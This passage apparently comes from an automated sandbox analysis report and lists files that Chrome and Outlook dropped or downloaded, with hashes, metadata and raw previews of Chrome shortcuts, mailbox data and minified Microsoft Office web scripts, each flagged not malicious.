                              Preview:L..................F.@.. ...$+.,......r.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.i....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|k@.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:16:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2675
                              Entropy (8bit):4.0025932085816915
                              Encrypted:false
                              SSDEEP:
                              MD5:A4FE1B0E625692D12F7E4D72CBDD2A3B
                              SHA1:22CFFFCF34739E70336A5A9D5F1E80D996740C83
                              SHA-256:2E1891AF3D2118F71E88A4FF061DC360F917F7A003F5B33CE18647289E730C49
                              SHA-512:320C83D6B30E5BBBE24EEC66BCBD28AC9B6746A51536D7E033F8FCC001D324FB8FBFB1D7248E84CE5F2CA5F3C04A1B926EECB5BCB0FC4AE600342DF906349500
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....9.d.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.i....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|k@.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2689
                              Entropy (8bit):4.009962465974624
                              Encrypted:false
                              SSDEEP:
                              MD5:AC2F29693124D2A31EAEC4976D52595B
                              SHA1:635ED95F4FBD0CE6E9BF42281B851B6394B38DFC
                              SHA-256:63F3DFA7CE739811C95E3D985238F1DF47726A88925F81E69FA6787CF63E508E
                              SHA-512:0A42AE5E8748223CB51ACCD31AF6195DC55A50B3C8DA92F274E884A7B3A499B9937A20DC5DD30B30CDFD37767FB41B26359E30D940F2CF7E1C5AA42D7B5B7098
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.i....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|k@.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:16:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):4.002919934416687
                              Encrypted:false
                              SSDEEP:
                              MD5:12ED4D546E45BB1D87110FD37A636B82
                              SHA1:28A44F57DF92A085278B170EFF7CF479069687AE
                              SHA-256:F474631D5998F2A875110323107070F1411FBA364DF51554E87FB4E4C0FC92A3
                              SHA-512:57F890C7565668F992E81722D88993DFF1D1B2522F19D50C17331EA9E224FB25B212759F5C23FDBD45AD0723A1156FD6B94EA78ED8FE6FA52482327FB5B0D6E0
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....^.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.i....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|k@.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:16:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.990337748085265
                              Encrypted:false
                              SSDEEP:
                              MD5:06376F22F084E84F30D7C0CEC6E0B2EF
                              SHA1:562024E0CD49F56BF90CB8E6AE1EBB79603EEFE3
                              SHA-256:788ABF125185979AFF2B62D79B58059B72A1427717B9770DE5DE450A6624C733
                              SHA-512:97DC63BADCE94DC33EA20AA57481798512E0431D5F704BB24A25068E83208C5CA75EC2DD57B304F0D728E848318C941ECC72C6BB4CC529CEBEB945823F1CF83A
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,......k.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.i....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|k@.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 12:16:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2679
                              Entropy (8bit):4.000067594855455
                              Encrypted:false
                              SSDEEP:
                              MD5:19365CE7B4B37D07395CBB38EE80DDBC
                              SHA1:8A3E08D5B3FE9B869422FC8A3B5198026E9C6BEE
                              SHA-256:46C31486549E283E5F5914331D522E606D13E3970D188A0B6B521614B8955F8E
                              SHA-512:EA8ABD37D12D34E95F5DC20C35A7E69D5F4FAD678156A0A6BA3CED653DEAD1D3E81389BDBC197A3D3FDCECB482B60D3F486183BC31DE7D12490E482ABDF6BF55
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....x+T.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.i....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.j....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.j....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.j..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.j...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............|k@.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:Microsoft Outlook email folder (>=2003)
                              Category:dropped
                              Size (bytes):271360
                              Entropy (8bit):3.5534102493813
                              Encrypted:false
                              SSDEEP:
                              MD5:E62C22050E67EF128EC9631499CDA7A7
                              SHA1:AC93697AE1A106F18684297AE2A47D11DC4891C2
                              SHA-256:A433ADA199A1A6B3889B0E9BDE1DB72E09E9BC5673B9AA4238DCE313603A4406
                              SHA-512:CF3DF4D940F6AE03D62933D2F6375C00EBCFE86D2F3A41D0C11AD2B843C9448B46863F8AB7630318165BA5386E1C7B457EBA3132AC0BBD4D3B4F91F2F4F485E3
                              Malicious:false
                              Reputation:unknown
                              Preview:!BDN3..SM......\.......................[................@...........@...@...................................@...........................................................................$.......D.......L..........................................................................................................................................................................................................................................................................................................................|........bsC.-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):131072
                              Entropy (8bit):4.929147773519704
                              Encrypted:false
                              SSDEEP:
                              MD5:7891DDC0FF1C58D3004F935E85E4EA3D
                              SHA1:BCA2830F174BD76920DC428887638936B727B708
                              SHA-256:36C68221324D4774C6BB9678CEB2DE7115536D9D4321901D4EBC48BB3E863A6C
                              SHA-512:B434FDE61682453A031EF76F18751AE272CE3202B1B20DEA8FF7040D5AC620425BED31D966D0672478ABC84C9C75A1BBD1C9EF31A64F23A5504C716926918FC4
                              Malicious:false
                              Reputation:unknown
                              Preview:.&..C...p.......@....>.......................#.!BDN3..SM......\.......................[................@...........@...@...................................@...........................................................................$.......D.......L..........................................................................................................................................................................................................................................................................................................................|........bsC.-...>..........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4504)
                              Category:downloaded
                              Size (bytes):19142
                              Entropy (8bit):5.138002150782762
                              Encrypted:false
                              SSDEEP:
                              MD5:5B5E41B9FA6809031AD5049DAB43DA58
                              SHA1:C175CF784EF67A55BF72A8B8C6E1F1509516DA40
                              SHA-256:8BD134B01D9E1C4FC3033DFF6E53BF1679121C11A716C48667D5594673295A93
                              SHA-512:E9414E263615C7620DB183A12E7CDDD9A1361D4AE67425599F5D86291328821B3A12B0D49AC4B03843973E550971718857A1E1201CCFF800E91E4A920442F08C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/53.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[53,176,761],{2088:function(e,t,n){n.d(t,{a:function(){return m},b:function(){return l},d:function(){return f},e:function(){return u}});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(112),o=n(111),s=n(921),c=n(154),d="@ms/odsp-shared/lib/base/BaseModel",l=new i.qT({name:"".concat(d,".asyncType"),factory:new i.bF(o.a)}),u=new i.qT({name:"".concat(d,".observablesFactoryType"),factory:new i.ap(s.a,{asyncType:l.optional})}),f=new i.qT({name:"".concat(d,".eventGroupType"),factory:new i.bF(r.b)}),p=new i.qT({name:"".concat(d,".errorHandler")}),m=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this,i=t.id,r=void 0===i?"":i;return a.id=r,a._BaseModel_dependencies=n,a}return(0,a.XJ)(t,e),Object.defineProperty(t.prototype,"async",{get:function(){return this._BaseModel_getAsync()},enumerable:!1,configurable:!0}),Object.defineProperty(t.prototype,"events",{get:function(){return thi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (19374)
                              Category:downloaded
                              Size (bytes):46436
                              Entropy (8bit):5.479339899917425
                              Encrypted:false
                              SSDEEP:
                              MD5:C21A77B6645C6CB137BB14DBD372C63D
                              SHA1:0F818029C3E7C3B501EABC1E43BCDB191CCDF237
                              SHA-256:2FFC19378A1DF0348A6DCA13169C6B26168CFC3BD045A1892ED6FCC8019A4059
                              SHA-512:17FD5B8E5EAA986C2F8A9BF833E067AE85E463466237EA0E11338A8C2E241E0E7AC71CDE8D37DA966A7D385BA7289F48F985AAE7C0DCE5C8BB478D40244297F8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/38.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[38,107],{1008:(e,t,n)=>{n.d(t,{a:()=>b,b:()=>y,c:()=>D});var a,i=n("tslib_102"),r=n(559),o=n(439),s=n(42),c=n(5),d=n(123),l=n(52),u=n(458),f=n("odsp.util_578"),p=!f.HW.isActivated("5428C17B-A89D-4E63-A1C5-B3E989C1B7A3","8/21/2023","Remove color tag from edit view columns"),m=f.HW.isActivated("b7f49711-c56b-4749-a1bc-a91875390f45"),_=f.HW.isActivated("54b0c38f-b2dc-4be3-98ff-627ec8e4bdef"),h=((a={})[d.c.icon]={key:"type",index:0,isVisibleMobile:!0,isCollapsable:!1,type:l.a.FileIcon},a[d.c.name]={key:"name",index:1,isRowHeader:!0,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Name},a[d.c.title]={key:"Title",index:1,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Title},a[d.c.shareHeroCommand]={key:"_shareHeroCommand",index:2,isVisibleMobile:!1,isCollapsable:!0,minWidth:16,width:18,type:l.a.ShareCommand},a[d.c.calloutInvoker]={key:"_callout
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7286)
                              Category:downloaded
                              Size (bytes):15235
                              Entropy (8bit):5.403205953802907
                              Encrypted:false
                              SSDEEP:
                              MD5:36CD22AE4DE4341DBA873DD6F8B9BD39
                              SHA1:44789B6E4B627676F99B3DED992FEBB0081E7F80
                              SHA-256:B85871667977D1856DC52135EDB3A3D8B56C416B76B8E9CF73C6E832093DD0F3
                              SHA-512:0828BC7470596E346B24A15CD76597A813CE990D460F440489F16FA3468E33A2B28B7283C80C38FA0DAEF6E1DEA5708E22A139227293D2BA63E14F3E373D7F32
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/203.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[203],{1878:(e,t,n)=>{n.d(t,{a:()=>o});var a=n(947),i=n(948),r=n(1284);function o(e){var t=(0,a.a)(e,{enableDetailsListFieldRenderPageLoadBarrier:i.i}).enableDetailsListFieldRenderPageLoadBarrier;return void 0===t||t?(0,r.b)(e):void 0}}.,1619:(e,t,n)=>{n.d(t,{a:()=>h,b:()=>_,c:()=>m});var a,i=n("tslib_102"),r=n("react-lib"),o=n("fui.lco_35"),s=n("fui.util_150"),c=("".concat(s.YI,"/"),{access:["accdb"],delve:[],excel:["csv","ods","xls","xlsx","xltx","xlsb","xlsm","xlt","xltm"],infopath:["xsn"],office:[],onedrive:[],onenote:["one","onepkg","onetoc","onetoc2"],outlook:[],powerpoint:["odp","potx","ppsx","pptx"],project:["mpp","mpt","pub"],sharepoint:[],sway:[],teams:[],visio:["vsd","vsdm","vsdx","vdw","vss","vssm","vssx","vst","vstm","vstx"],word:["docx","dotx","odt","doc","docm","docb","dot","dotm"],stream:[]}),d=n(1034);var l=n(1621),u=n(1135),f=n(2348),p=n(1620),m="onetoc",_=24,h=r.memo(function(e){var t,n=e.ex
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (14673)
                              Category:downloaded
                              Size (bytes):17089
                              Entropy (8bit):5.141244943253462
                              Encrypted:false
                              SSDEEP:
                              MD5:16568D8F0B49F60C6B9F901E7A1D4309
                              SHA1:06568CA8EA8C120665DFA88D802356E1A5D075B7
                              SHA-256:0E361724D29E734C47320D227CAF0EC1D6D5C0124045A25474FD49A569B08960
                              SHA-512:B51FCE2F0D2F4FBEE77AB0820AB5AA4044157E8A511CE8564C94F8BE534DE83CD31A76D3DC677FCC2E0822BC5A53CEB8B390E5E8EDF21A6F0C8E7A251A0906BF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/37.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[37],{2910:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a}}),(0,n("fui.util_150").pZ)([{rawString:".GetMoreStoragePrimaryButton_0cf88cc2{background-color:"},{theme:"orange",defaultValue:"#d83b01"},{rawString:';border:"none";color:'},{theme:"white",defaultValue:"#fff"},{rawString:';width:"auto"}.GetMoreStoragePrimaryButton_0cf88cc2:hover{background-color:'},{theme:"orange",defaultValue:"#d83b01"},{rawString:";color:"},{theme:"white",defaultValue:"#fff"},{rawString:";cursor:pointer}.GetMoreStoragePrimaryButtonV2_0cf88cc2{background-color:"},{theme:"orange",defaultValue:"#d83b01"},{rawString:';border:"none";color:'},{theme:"white",defaultValue:"#fff"},{rawString:';width:"auto"}.GetMoreStoragePrimaryButtonV2_0cf88cc2:hover{color:'},{theme:"white",defaultValue:"#fff"},{rawString:";cursor:pointer}"}]);const a="GetMoreStoragePrimaryButton_0cf88cc2",i="GetMoreStoragePrimaryButtonV2_0cf88cc2"}.,290
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12746)
                              Category:downloaded
                              Size (bytes):634682
                              Entropy (8bit):5.086774188887244
                              Encrypted:false
                              SSDEEP:
                              MD5:DCA2CF7D2B51E23A88539145D49CCFE0
                              SHA1:168B21FA5B59678C2F2A0487533B26C1025EA3E6
                              SHA-256:99954D2AE09D9764ECEA13B17A98D88D747A372202D8DCEA29F9C58A6456005C
                              SHA-512:6B646A2C45D62D0C08308A2F948DB19066BDED7B1FA2A2BED75D7F4BEDBAFED94123AC8167F91719B6560F83DFB98CB601947584D994F2C231E289145B5F24DB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/fr/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6695:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7491:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (601)
                              Category:downloaded
                              Size (bytes):777
                              Entropy (8bit):5.299393123750983
                              Encrypted:false
                              SSDEEP:
                              MD5:BF375D00A5B3733996A4B07E341852FB
                              SHA1:2D1EC8BA973C4C0703976038ADA94793B9D9CFEE
                              SHA-256:BFFA2B6A2A1612145C189EE605A7510EA4B779602943B87BC3012E1D931889D6
                              SHA-512:2271C2836CE9C570FC05DB8683E97DD091DA0E57869C1AFE328650C8E9CC7898B57F7C0A0E5421C2873242883AE5FE58DC3F8D560FF43B0DFADFA36FC32FA280
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/29.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[29],{733:(e,t,n)=>{n.r(t),n.d(t,{updateDragHandle:()=>r});var a=n(1353),i=n(3);function r(e,t,n,r,o,s){var c=t.rowEnd,d=t.colStart,l=t.colEnd;e.style.gridRowEnd="calc( ".concat(c," + var(").concat(i.t,") )"),e.style.gridColumnStart=String(d),e.style.gridColumnEnd=String(l),e.style.alignSelf="end",e.style.justifySelf=n?"end":"start",e.style.display=r?"none":"unset";var u=o+1;(n?l<=u:d<=u)?(e.classList.toggle(a.a,!0),e.style.left=1===d?"0px":"".concat(s||e.offsetLeft,"px")):(e.classList.toggle(a.a,!1),e.style.left="")}}.,1353:(e,t,n)=>{n.d(t,{a:()=>a}),(0,n("fui.util_150").pZ)([{rawString:".dragHandleOnSticky_963839e1{position:sticky;z-index:22}"}]);const a="dragHandleOnSticky_963839e1"}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (899)
                              Category:downloaded
                              Size (bytes):2589
                              Entropy (8bit):5.463382128593072
                              Encrypted:false
                              SSDEEP:
                              MD5:B492CCFD6DBDA49AADCC049768C43EA4
                              SHA1:9457A3A27B8F8349DC38A9795D4D7E1B38CD9D13
                              SHA-256:86921A02382C98BF4F2777EA86CD28612DCCCD134B79D63CBF748CBF903B2B03
                              SHA-512:5665AB1A84B2DB30C82A42A416322D699EE6A7304481B7C7C6B12669BA82BC518A9FD13139B9AEF5C18C6778A5B3DDD93710222ABF8E57B8628D7310689C552F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/89264.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[89264],{432278:(e,t,n)=>{n.d(t,{A:()=>r,d:()=>o});var a=n(408156);const i=a.createContext(void 0),r=i.Provider,o=()=>a.useContext(i)}.,56525:(e,t,n)=>{n.d(t,{M:()=>r,k:()=>i});var a=n(432278);function i(e,t){return r((0,a.d)(),e,t)}function r(e,t,n){if(!e)return t;t={...t};const{generatedControlId:a,hintId:i,labelFor:r,labelId:o,required:s,validationMessageId:c,validationState:d}=e;var l,u,f,p,m,_,h,b,g,v,y,S;return a&&(null!==(u=(l=t).id)&&void 0!==u||(l.id=a)),!o||(null==n?void 0:n.supportsLabelFor)&&r===t.id||null!==(p=(f=t)["aria-labelledby"])&&void 0!==p||(f["aria-labelledby"]=o),(c||i)&&(t["aria-describedby"]=[c,i,null==t?void 0:t["aria-describedby"]].filter(Boolean).join(" ")),"error"===d&&(null!==(_=(m=t)["aria-invalid"])&&void 0!==_||(m["aria-invalid"]=!0)),s&&((null==n?void 0:n.supportsRequired)?null!==(b=(h=t).required)&&void 0!==b||(h.required=!0):null!==(v=(g=t)["aria-required"]
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (22323)
                              Category:downloaded
                              Size (bytes):137615
                              Entropy (8bit):5.461301209320667
                              Encrypted:false
                              SSDEEP:
                              MD5:0617C1BC4E9729013FAFD1695B22F028
                              SHA1:2001DA97EB0029A137808DE4D6290025558F546D
                              SHA-256:D823ECCDE1AAA05727CE3111CAF532EFCF19A2AD9FDE5C0433F18C2314FB9E68
                              SHA-512:8EFC7076D99B25D34B7E200DE931663B4FD00AFF11FF302366F8DC9119492F5B492C362A616899F447FB637FB87B3DA1E91E1D4C00F867BA9B62A462B6610712
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/56.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[56],{1669:(e,t,n)=>{n.d(t,{a:()=>i,b:()=>r,c:()=>o});var a=n(1553);const i=(0,a.a)("ArrowClockwise16Regular","16",["M3 8a5 5 0 0 1 9-3H9.5a.5.5 0 0 0 0 1h3a.5.5 0 0 0 .5-.5v-3a.5.5 0 0 0-1 0v1.03A6 6 0 1 0 14 8a.5.5 0 0 0-1 0A5 5 0 0 1 3 8Z"]),r=(0,a.a)("ArrowClockwise24Regular","24",["M12 4.5a7.5 7.5 0 1 0 7.42 6.4c-.07-.46.26-.9.72-.9.37 0 .7.26.76.62A9 9 0 1 1 18 5.3V4.25a.75.75 0 0 1 1.5 0v3c0 .41-.34.75-.75.75h-3a.75.75 0 0 1 0-1.5h1.35a7.47 7.47 0 0 0-5.1-2Z"]),o=(0,a.a)("ArrowCounterclockwise16Regular","16",["M13 8a5 5 0 0 0-9-3h2.5a.5.5 0 0 1 0 1h-3a.5.5 0 0 1-.5-.5v-3a.5.5 0 0 1 1 0v1.03A6 6 0 1 1 2 8a.5.5 0 0 1 1 0 5 5 0 0 0 10 0Z"])}.,1670:(e,t,n)=>{n.d(t,{a:()=>i,b:()=>r,c:()=>o});var a=n(1553);const i=(0,a.a)("ArrowUndo16Regular","16",["M3 2.5a.5.5 0 0 1 1 0v3.84l3.17-3.17a4 4 0 0 1 5.66 5.66L7.8 13.85a.5.5 0 0 1-.7-.7l5.02-5.03a3 3 0 1 0-4.24-4.24L4.76 7H8.5a.5.5 0 0 1 0 1H3.6a.6.6 0 0 1-.6-.6V2
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4214)
                              Category:downloaded
                              Size (bytes):6701
                              Entropy (8bit):5.43548748768128
